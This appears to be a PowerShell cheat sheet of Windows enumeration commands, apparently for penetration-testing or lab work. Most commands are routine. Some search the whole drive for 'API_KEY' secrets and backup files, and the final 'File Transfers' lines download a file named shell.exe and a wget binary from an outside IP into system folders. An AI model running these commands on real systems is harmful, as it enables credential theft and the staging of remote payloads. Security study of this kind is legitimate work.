PowerShell
Search command
Get-command get-*ip*
List files
Get-Childitem -Path C:\
File search
Get-Childitem -Path C:\ -Recurse -force -Include *.txt
Get-Childitem -Path C:\ -Recurse -force -ErrorAction SilentlyContinue -Include *interesting-file.txt*
Get-Childitem -Path C:\ -Recurse -force -ErrorAction SilentlyContinue -Filter *interesting-file.txt*
Get-ChildItem -Path C:\ -Include *.bak* -File -Recurse -ErrorAction SilentlyContinue
Read file
more interesting-file.txt
Search by content
Get-ChildItem C:\* -Recurse | Select-String -pattern API_KEY
Show services
Get-Service
Get-Service | Where-Object -Property Status -eq Running
Get-Service | Where-Object -Property Status -eq Stopped
Current working directory
get-location
Check if file exists
Test-Path "c:/program files/interesting-files.txt"
Get list of users
Get-LocalUser
Get list of users with details
get-localuser | select *
Get details of user
get-localuser -name Administrator | select *
List local groups
Get-LocalGroup
Get IP address
Get-NetIPAddress
Get all processes
get-process
List scheduled tasks
get-scheduledtask
Get owner of
get-acl c:
File Transfers
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.99.99/wget.exe','C:\Users\jac\Desktop\wget.exe')"
powershell -c "Invoke-WebRequest -Uri 'http://10.10.99.99:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"